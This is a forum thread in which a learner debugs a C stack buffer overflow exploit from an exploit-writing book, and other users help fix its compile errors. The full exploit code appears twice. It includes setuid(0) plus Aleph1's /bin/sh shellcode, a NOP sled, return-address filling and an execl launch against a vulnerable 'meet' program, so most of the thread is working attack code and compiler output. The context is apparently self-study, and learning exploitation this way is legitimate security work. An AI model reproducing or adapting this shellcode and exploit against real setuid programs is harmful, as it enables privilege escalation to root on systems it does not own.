C Exploit Errors

[Israel]

Been reading a good book on writing exploits. Maybe I've been up too long, but I can't seem to find the last errors in this code. Here's what I got:

Code: Select all

// exploit.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char shellcode[] = //setuid(0) & Aleph1's shellcode
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80" // setuid(0) first
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
//Small function to retrieve the esp value (only works locally)
unsigned long get_sp(void) {
   __asm__(".intel_syntax noprefix\n mov eax, esp");
}

int main(int argc, char *argv[1]) { //main function
int i, offset = 0;          //used to count/subtract later   
long esp, ret, *addr_ptr;          //used to save addresses
char *buffer, *ptr;          //two strings: buffer, ptr
int size = 500;             //default buffer size

esp = get_sp();             //get local esp value
if(argc > 1) size = atoi(argv[1]);  //if 1 argument, store to size
if(argc > 2) offset = atoi(argv[2]);//if 2 argument, store offset
if(argc > 3) esp = strou1(argv[3],NULL,0); //used for remote exploits
ret = esp - offset;          //calc default value of return
// print directions for use
fprintf(stderr,"Useage: %s<buff_size> <offset> <esp:0xfff...>\n", argv[0]);
//print feedback of operation
fprintf(stderr, "ESP:0x%x  Offset:0x%x  Return:0x%x\n",esp,offset,ret);

buffer = (char *)malloc(size);      //allocate buffer on heap
ptr = buffer;                       //temp pointer,set to location of buffer
addr_ptr = (long *) ptr;       //temp addr_ptr, set to location of ptr
//Fill entire buffer with return addresses, ensures proper alignment
for(i=0; i < size; i+=4){            //increment of 4 bytes for addr
    *(addr_ptr++) = ret;       //use addr_ptr to write into buffer
}
//Fill 1st half of exploit buffer with NOPs
for(i=0; i < size/2; i++){       //notice we only write up to half the size
   buffer[i] = '\x90';       //place NOPs in the first half of buffer
}

// Now place shellcode
ptr = buffer + size/2;
for(i=0; i < strlen(shellcode); i++)//write half the buffer til the end of sc   
   *(ptr++) = shellcode[i];    //now write the shellcode
}
//Terminate the string
buffer[size-1]=0;          //this is so the buffer ends with x\0
//Now, call the vulerable program with buffer as second arguement.
exec1("./meet", "meet", "Mr.",buffer,0); //the list of args is ended w/0
printf("%s\n",buffer);          //used for remote exploits
//free up the heap
free(buffer);             //play nicely
return   0;                  //exit gracefully
}

Here's the errors from gcc:

Code: Select all

# gcc ./exploit.c -o exploit
./exploit.c:50: error: 'size' undeclared here (not in a function)
./exploit.c:50: warning: data definition has no type or storage class
./exploit.c:52: error: expected declaration specifiers or '...' before string constant
./exploit.c:52: error: expected declaration specifiers or '...' before string constant
./exploit.c:52: error: expected declaration specifiers or '...' before string constant
./exploit.c:52: error: expected declaration specifiers or '...' before 'buffer'
./exploit.c:52: error: expected declaration specifiers or '...' before numeric constant
./exploit.c:52: warning: data definition has no type or storage class
./exploit.c:53: error: expected declaration specifiers or '...' before string constant
./exploit.c:53: error: expected declaration specifiers or '...' before 'buffer'
./exploit.c:53: warning: data definition has no type or storage class
./exploit.c:53: error: conflicting types for 'printf'
./exploit.c:53: note: a parameter list with an ellipsis can't match an empty parameter name list declaration
./exploit.c:55: warning: data definition has no type or storage class
./exploit.c:55: warning: parameter names (without types) in function declaration
./exploit.c:55: error: conflicting types for 'free'
./exploit.c:56: error: expected identifier or '(' before 'return'
./exploit.c:57: error: expected identifier or '(' before '}' token


[mischief]

you use but never define 'size'. the error message is quite clear about that. :\

[Israel]

Didn't I already do that in the main function?

Line 20:

Code: Select all

int size = 500;             //default buffer size

[mischief]

Code: Select all

for(i=0; i < strlen(shellcode); i++)//write half the buffer til the end of sc   
   *(ptr++) = shellcode[i];    //now write the shellcode
}
//Terminate the string
buffer[size-1]=0;          //this is so the buffer ends with x\0

i think you've added/forgotten braces someplace, possibly after the for statement i quoted. what's happening is you have a problem with scope. you're probably closing main()'s scope with a missing/added brace somewhere.

[xcurious]

You are missing a opening brace after your for statement and also it seems you need to define strou1 and exec1 before you can use them as a function.

[Israel]

Ok, first I found that bracket I was missing. Then for some reason got all these assembly errors even though the same exact code ran perfect in another program. Changed the assembly from nasm to at&t syntax and that was fixed. Then after some googling I discovered the strou1 and exec1 should have been stroul and execl. I had mistaken the L's in my text for ones. I found adding "#include <unistd.h>" to the code would take care of the errors with execl. Now all I have is this:

Code: Select all

# gcc exploit.c -o exploit
/tmp/ccjxgLfn.o: In function `main':
exploit.c:(.text+0x98): undefined reference to `stroul'
collect2: ld returned 1 exit status


Here's the new code:

Code: Select all

// exploit.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

char shellcode[] = //setuid(0) & Aleph1's shellcode
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80" // setuid(0) first
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
//Small function to retrieve the esp value (only works locally)
unsigned long get_sp(void) {
//   __asm__(".intel_syntax noprefix\n mov eax, esp");
   __asm__("movl %esp, %eax");
}

int main(int argc, char *argv[1]) { //main function
int i, offset = 0;          //used to count/subtract later   
long esp, ret, *addr_ptr;          //used to save addresses
char *buffer, *ptr;          //two strings: buffer, ptr
int size = 500;             //default buffer size

esp = get_sp();             //get local esp value
if(argc > 1) size = atoi(argv[1]);  //if 1 argument, store to size
if(argc > 2) offset = atoi(argv[2]);//if 2 argument, store offset
if(argc > 3) esp = stroul(argv[3],NULL,0); //used for remote exploits
ret = esp - offset;          //calc default value of return
// print directions for use
fprintf(stderr,"Useage: %s<buff_size> <offset> <esp:0xfff...>\n", argv[0]);
//print feedback of operation
fprintf(stderr, "ESP:0x%x  Offset:0x%x  Return:0x%x\n",esp,offset,ret);

buffer = (char *)malloc(size);      //allocate buffer on heap
ptr = buffer;                       //temp pointer,set to location of buffer
addr_ptr = (long *) ptr;       //temp addr_ptr, set to location of ptr
//Fill entire buffer with return addresses, ensures proper alignment
for(i=0; i < size; i+=4){            //increment of 4 bytes for addr
    *(addr_ptr++) = ret;       //use addr_ptr to write into buffer
}
//Fill 1st half of exploit buffer with NOPs
for(i=0; i < size/2; i++){       //notice we only write up to half the size
   buffer[i] = '\x90';       //place NOPs in the first half of buffer
}

// Now place shellcode
ptr = buffer + size/2;
for(i=0; i < strlen(shellcode); i++){//write half the buffer til the end of sc   
   *(ptr++) = shellcode[i];    //now write the shellcode
}
//Terminate the string
buffer[size-1]=0;          //this is so the buffer ends with x\0
//Now, call the vulerable program with buffer as second arguement.
execl("./meet", "meet", "Mr.",buffer,0); //the list of args is ended w/0
printf("%s\n",buffer);          //used for remote exploits
//free up the heap
free(buffer);             //play nicely
return   0;                  //exit gracefully
}

[mischief]

there is no such function as stroul :p try 'strtoul'

[Israel]

You're right. I checked the book, must have made a late night typo. Still, my opinion of the writing has changed now. They didn't include any of these:

Code: Select all

#include <stdlib.h> // gave warnings without
#include <string.h> // gave warnings without
#include <unistd.h> // would not compile without

Thanks for the help!

[mischief]

they were probably using a different compiler, or possibly different compilation flags, or headers that included each other later on. a hole host of differences could occur :p

[Israel]

Used the same flags and same compiler (maybe a newer version though...) Oh well, it made me think